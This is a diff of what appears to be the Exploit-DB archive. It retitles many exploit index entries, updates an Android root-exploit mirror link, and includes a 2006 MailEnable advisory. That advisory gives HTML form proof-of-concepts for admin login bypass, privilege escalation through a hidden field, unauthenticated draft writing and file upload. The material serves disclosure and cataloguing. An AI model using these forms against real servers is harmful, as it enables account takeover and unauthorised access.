21623,platforms/linux/local/21623.txt,"Python 1.5.2 Pickle Unsafe eval() Code Execution Vulnerability",2002-07-17,"Jeff Epler",linux,local,0
@ -18913,7 +18913,7 @@ id,file,description,date,author,platform,type,port
21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 Popmax Buffer Overflow Vulnerability",2002-07-20,anonymous,windows,remote,0
21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1)",2002-07-23,Kyuzo,windows,dos,0
21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2)",2002-07-23,"andrea lisci",windows,remote,0
21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0
21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0
21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0
21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0
21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0
@ -20219,7 +20219,7 @@ id,file,description,date,author,platform,type,port
22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0
22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0
22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0
22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0
22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-02,Xpl017Elz,unix,remote,0
23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0
22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability",2003-08-06,Xpl017Elz,unix,remote,0
22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow Vulnerability",2003-07-31,daniels@legend.co.uk,freebsd,remote,0
@ -20351,7 +20351,7 @@ id,file,description,date,author,platform,type,port
23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 File Disclosure Vulnerability",2003-09-08,euronymous,windows,remote,0
23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 XML Page Object Type Validation Vulnerability",2003-09-08,http-equiv,windows,remote,0
23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun Vulnerability",2003-09-08,D4rkGr3y,windows,remote,0
23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability",2003-09-08,"Luigi Auriemma",windows,dos,0
23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow Vulnerability",2003-09-08,"Luigi Auriemma",windows,dos,0
23125,platforms/php/webapps/23125.txt,"PHPBB 2.0.6 URL BBCode HTML Injection Vulnerability",2003-09-08,keupon_ps2,php,webapps,0
23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Local Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0
23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Cross-Site Scripting Vulnerability",2003-09-09,"Bahaa Naamneh",cgi,webapps,0
@ -21649,7 +21649,7 @@ id,file,description,date,author,platform,type,port
24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
24468,platforms/windows/dos/24468.pl,"KMPlayer All Versions - Denial of Service",2013-02-10,Jigsaw,windows,dos,0
24510,platforms/php/webapps/24510.txt,"Scripts Genie Domain Trader (catalog.php id param) - SQL Injection Vulnerability",2013-02-17,3spi0n,php,webapps,0
24511,platforms/windows/dos/24511.txt,"SAP Netweaver Message Server Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0
24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
@ -22219,7 +22219,7 @@ id,file,description,date,author,platform,type,port
25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0
25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0
25060,platforms/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",asp,webapps,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0
25061,platforms/windows/dos/25061.txt,"Nullsoft Winamp 5.0.x - Variant IN_CDDA.dll Remote Buffer Overflow Vulnerability",2005-01-25,"Yu Yang",windows,dos,0
25062,platforms/php/webapps/25062.txt,"Comdev eCommerce 3.0 INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,php,webapps,0
25063,platforms/windows/dos/25063.pl,"War FTP Daemon 1.8 - Remote Denial of Service Vulnerability",2005-01-27,MC.Iglo,windows,dos,0
25064,platforms/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) download.php Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",php,webapps,0
@ -22582,7 +22582,7 @@ id,file,description,date,author,platform,type,port
25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting Vulnerability",2005-04-18,"hoang yen",php,webapps,0
25439,platforms/multiple/dos/25439.c,"Multiple Vendor TCP Session Acknowledgement Number Denial of Service Vulnerability",2004-12-13,"Antonio M. D. S. Fortes",multiple,dos,0
25440,platforms/php/webapps/25440.txt,"Wordpress wp-FileManager - Arbitrary File Download Vulnerability",2013-05-14,ByEge,php,webapps,0
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) All Versions (1.x? / 2.x / 3.x) - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0
25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - (invoicefunctions.php id param) SQL Injection Vulnerability",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0
25443,platforms/windows/dos/25443.txt,"Quick Search 1.1.0.189 - Buffer Overflow Vulnerability (SEH)",2013-05-14,ariarat,windows,dos,0
25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.37 <= 3.x.x - PERF_EVENTS Local Root Exploit",2013-05-14,sd,linux,local,0
@ -24978,7 +24978,7 @@ id,file,description,date,author,platform,type,port
27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0
27872,platforms/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0
27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - RCE PoC",2013-08-26,Aodrulez,hardware,remote,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 (winamp.ini) - Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27875,platforms/linux/dos/27875.c,"libtiff <= 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0
27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0
27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,metasploit,windows,remote,7770
@ -29621,7 +29621,7 @@ id,file,description,date,author,platform,type,port
32846,platforms/php/webapps/32846.txt,"Nenriki CMS 0.5 - 'ID' Cookie SQL Injection Vulnerability",2009-03-10,x0r,php,webapps,0
32847,platforms/multiple/local/32847.txt,"PostgreSQL 8.3.6 Low Cost Function Information Disclosure Vulnerability",2009-03-10,"Andres Freund",multiple,local,0
32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Local Privilege Escalation Vulnerability",2009-03-10,"Sun Microsystems",linux,local,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32849,platforms/linux/dos/32849.txt,"PostgreSQL <= 8.3.6 - Conversion Encoding Remote Denial of Service Vulnerability",2009-03-11,"Afonin Denis",linux,dos,0
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32851,platforms/windows/remote/32851.html,"Microsoft Internet Explorer 10 - CMarkup Use-After-Free (MS14-012)",2014-04-14,"Jean-Jamil Khalife",windows,remote,0
32852,platforms/php/webapps/32852.txt,"TikiWiki 2.2/3.0 - 'tiki-galleries.php' Cross-Site Scripting Vulnerability",2009-03-12,iliz,php,webapps,0
@ -29683,7 +29683,7 @@ id,file,description,date,author,platform,type,port
32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0
32914,platforms/php/webapps/32914.php,"Geeklog <= 1.5.2 - 'usersettings.php' SQL Injection Vulnerability",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0
33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0
32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
@ -30069,7 +30069,7 @@ id,file,description,date,author,platform,type,port
33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting Vulnerability",2009-10-26,blake,php,webapps,0
33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1_ESXi Server <= 3.5 - Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0
33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0
33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0
33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 - Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0
33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 - 'libpr0n' GIF Parser Heap Based Buffer Overflow Vulnerability",2009-10-27,regenrecht,linux,remote,0
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
@ -31253,7 +31253,7 @@ id,file,description,date,author,platform,type,port
34688,platforms/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting Vulnerability",2009-07-27,PLATEN,php,webapps,0
34689,platforms/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injection Vulnerabilities",2009-08-27,Evil-Cod3r,php,webapps,0
34690,platforms/php/webapps/34690.txt,"@Mail <= 6.1.9 - 'MailType' Parameter Cross-Site Scripting Vulnerability",2010-09-21,"Vicente Aguilera Diaz",php,webapps,0
34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser HTML Injection Vulnerability",2010-09-21,"Sumit Kumar Soni",multiple,remote,0
34691,platforms/multiple/remote/34691.txt,"CollabNet Subversion Edge Log Parser - HTML Injection Vulnerability",2010-09-21,"Sumit Kumar Soni",multiple,remote,0
34692,platforms/php/webapps/34692.txt,"WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting Vulnerability",2009-07-27,u.f.,php,webapps,0
34693,platforms/php/webapps/34693.txt,"Free Arcade Script 1.0 - 'search' Field Cross-Site Scripting Vulnerability",2009-08-27,"599eme Man",php,webapps,0
34694,platforms/php/webapps/34694.txt,"ClipBucket 1.7.1 - Multiple SQL Injection Vulnerabilities",2009-07-24,Qabandi,php,webapps,0
@ -31591,7 +31591,7 @@ id,file,description,date,author,platform,type,port
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
35062,platforms/multiple/remote/35062.txt,"RDM Embedded Lock Manager < 9.x - 'lm_tcp' Service Buffer Overflow Vulnerability",2010-12-07,"Luigi Auriemma",multiple,remote,0
35063,platforms/php/webapps/35063.txt,"Zimplit CMS - zimplit.php file Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35064,platforms/php/webapps/35064.txt,"Zimplit CMS English_manual_version_2.php - client Parameter XSS",2010-12-07,"High-Tech Bridge SA",php,webapps,0
35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
35066,platforms/php/webapps/35066.txt,"WordPress Processing Embed Plugin 0.5 - 'pluginurl' Parameter Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
35067,platforms/php/webapps/35067.txt,"WordPress Safe Search Plugin 'v1' Parameter - Cross-Site Scripting Vulnerability",2010-12-08,"John Leitch",php,webapps,0
@ -32994,7 +32994,7 @@ id,file,description,date,author,platform,type,port
36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0
36575,platforms/multiple/webapps/36575.py,"JBoss AS versions 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
36575,platforms/multiple/webapps/36575.py,"JBoss AS 3_ 4_ 5_ 6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0
36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0
36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0
36739,platforms/osx/local/36739.m,"Apple MAC OS X < 10.9/10 - Local Root Exploit",2015-04-13,mu-b,osx,local,0
@ -33247,7 +33247,7 @@ id,file,description,date,author,platform,type,port
36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
36840,platforms/multiple/dos/36840.py,"Wireshark <=1.12.4 - Memory Corruption and Access Violation PoC",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0
36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0
@ -33681,11 +33681,23 @@ id,file,description,date,author,platform,type,port
37297,platforms/linux/shellcode/37297.txt,"Linux/x86 - /etc/passwd Reader (58 bytes)",2015-06-16,B3mB4m,linux,shellcode,0
37317,platforms/php/webapps/37317.txt,"AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities",2012-05-27,AkaStep,php,webapps,0
37318,platforms/php/webapps/37318.txt,"PHPList 2.10.9 'Sajax.php' PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37319,platforms/windows/webapps/37319.html,"Tango DropBox 3.1.5 + PRO - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0
37320,platforms/windows/webapps/37320.html,"Tango FTP 1.0 (Build 136) - Activex Heap Spray",2015-06-19,metacom,windows,webapps,0
37321,platforms/php/webapps/37321.txt,"DynPage 1.0 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities",2012-05-25,KedAns-Dz,php,webapps,0
37322,platforms/multiple/webapps/37322.txt,"ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities",2015-06-19,Vulnerability-Lab,multiple,webapps,0
37323,platforms/hardware/webapps/37323.txt,"ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability",2015-06-19,Vulnerability-Lab,hardware,webapps,0
37325,platforms/multiple/webapps/37325.txt,"Lively cart SQL Injection vulnerability",2015-06-19,"Manish Tanwar",multiple,webapps,0
37325,platforms/multiple/webapps/37325.txt,"Lively Cart SQL Injection Vulnerability",2015-06-19,"Manish Tanwar",multiple,webapps,0
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0
37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0
37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0
37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0
37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0



@ -1,6 +1,6 @@
Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
orig: http://zenthought.org/content/file/android-root-2009-08-16-source
back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
# milw0rm.com [2009-08-18]


@ -1,138 +1,138 @@
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in
MailEnable Enterprise Edition ASP Version <= 2.0 that I listed them below:
1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
4) - Every one can make "myupload.ams" on server in "drafts" folder of every user!
5) - Every one can make "_myupload.csv" on server in "drafts" folder of every user!
6) - For changing password it need the current password but current password is mention in source of "ListAttachments.asp" file, if XSS attack or Session hijacking happened then attacker can gain the user's current password.
Details' Descriptions:
1)
Any user can login to web administration site with bug in "main.asp" (Enterprise)
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/meadmin/enterprise/lang/EN/main.asp" METHOD="POST">
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="postmaster"><br>
<input type=submit>
</FORM>
-----------------------End----------------------------
2)
Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
Bug in "MailOptions.asp" file: remote authenticated user can change value of hidden field (name="LoginRights")
from "USER" to "ADMIN" or "SYSADMIN" and change it's level to up! or change value of hidden field
(name="LoginStatus") to "0" to disable him/her account!
Proof's exploit:
-----------------------Start--------------------------
<FORM METHOD="post" ACTION="http://[URL]/MEWebMail/base/default/lang/EN/MailOptions.asp?SelectedIndex=1&FormAction=Edit">
<TABLE BORDER="0">
<TR><TD>Current Password:</TD><TD><INPUT name=LoginPassword VALUE=""></TD></TR>
<TR><TD>New Password:</TD><TD><INPUT name=NewLoginPassword VALUE=""></TD></TR>
<TR><TD>Confirm New Password:</TD><TD><INPUT name=ConfirmNewLoginPassword VALUE=""></TD></TR>
</TABLE>
<INPUT NAME="LoginDescription" VALUE="Login description">
<INPUT NAME="LoginRights" VALUE="SYSADMIN">
<INPUT NAME="LoginStatus" VALUE="1">
<BR><BR>
<INPUT type=submit value="UpTime!">
</FORM>
-----------------------End----------------------------
3)
Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
Bug in "Resolve.asp" file: this file don't check authenticated user!
Proof's exploit:
--------------Start---------------------
<FORM METHOD="post" ACTION="http://[url]/MEWebMail/base/default/lang/EN/Forms/MAI/Resolve.asp">
<TABLE BORDER="0">
<TR><TD>ME_MAILBOX:</TD><TD><INPUT name=ME_MAILBOX VALUE=""></TD></TR>
<TR><TD>ME_POSTOFFICE:</TD><TD><INPUT name=ME_POSTOFFICE VALUE=""></TD></TR>
<TR><TD>Folder:</TD><TD><INPUT name=Folder VALUE=""></TD></TR>
<TR><TD>ID:</TD><TD><INPUT name=ID VALUE=""></TD></TR>
<TR><TD>ComposeMode:</TD><TD><INPUT name=ComposeMode VALUE="General"></TD></TR>
<TR><TD>MsgFrom:</TD><TD><INPUT name=MsgFrom VALUE=""></TD></TR>
<TR><TD>MsgCc:</TD><TD><INPUT name=MsgCc VALUE=""></TD></TR>
<TR><TD>MsgTo:</TD><TD><INPUT name=MsgTo VALUE=""></TD></TR>
<TR><TD>MsgBCC:</TD><TD><INPUT name=MsgBCC VALUE=""></TD></TR>
<TR><TD>MsgBody:</TD><TD><INPUT name=MsgBody VALUE=""></TD></TR>
<TR><TD>MsgSubject:</TD><TD><INPUT name=MsgSubject VALUE=""></TD></TR>
</TABLE>
<BR><BR>
<INPUT type=submit value="Update" CLASS=ME_Button>
</FORM>
--------------End---------------------
4)
Make "myupload.ams" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/default/lang/EN/Forms/MAI/UploadAttachment.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
5)
Make "_myupload.csv" on server in "drafts" folder of every user!
Show Mail Enable folder's path if "username" or "postoffices" be incorrect!
Proof's exploit:
-----------------------Start--------------------------
<FORM NAME=FrmMain ACTION="http://[URL]/MEWebMail/base/enterprise/lang/EN/Forms/vcf/uploadcontact.asp" ENCTYPE="multipart/form-data" METHOD="POST">
MESSAGEID<INPUT NAME=MESSAGEID TYPE="text" VALUE="test123"><br>
POSTOFFICE<INPUT NAME=POSTOFFICE TYPE="text" VALUE="default"><br>
AUTH_PASSWORD<INPUT NAME=AUTH_PASSWORD TYPE="text" VALUE=""><br>
AUTH_USERNAME<INPUT NAME=AUTH_USERNAME TYPE="text" VALUE="testuser"><br>
Mode<INPUT NAME=Mode TYPE="text" VALUE="Compose"><br>
Folder<INPUT NAME=Folder TYPE="text" VALUE="\Drafts"><br>
ID<INPUT NAME=ID TYPE="text" VALUE="test123"><br>
<TABLE>
<TR><TD>File Name</TD><TD>
<INPUT TYPE=FILE NAME="txtFile">
<INPUT TYPE=submit VALUE="Add"></TD></TR>
</TABLE>
</FORM>
-----------------------End----------------------------
6)
Have password in source.
Proof:
-----------------------Start--------------------------
http://[URL]/MEWebmail/base/enterprise/lang/EN/Forms/MAI/ListAttachments.asp?Mode=Compose&ID=test.MAI&MsgFormat=HTML&FormAction=Send&ComposeMode=General&Folder=%5CDrafts
-----------------------End----------------------------
Product name: MailEnable Enterprise Edition
Version: All ASP version <= 2.0
URL: www.mailenable.com
Finder: Soroush Dalili
Team: GSG [Grayhatz.net]
Country: Iran
Site: Grayhatz.net
Email: IRSDL[a.t]Yahoo[d0t]Com
<< I hope secure world for all >>
# milw0rm.com [2006-06-09]
Hi, I'm Soroush Dalili from GrayHatz Security Group (GSG). I found multiple bugs in
MailEnable Enterprise Edition ASP Version <= 2.0 that I listed them below:
1) - Any user can login to web administration site.
2) - Authenticated normal user can gain ADMIN or SYSADMIN level, also remote user can disable him/her account!
3) - Every one (ever no authenticated user) can write a message in "Draft" folder of any users!
4) - Every one can make "myupload.ams" on server in "drafts" folder of every user!
5) - Every one can make "_myupload.csv" on server in "drafts" folder of every user!
6) - For changing password it need the current password but current password is mention in source of "ListAttachments.asp" file, if XSS attack or Session hijacking happened then attacker can gain the user's current password.
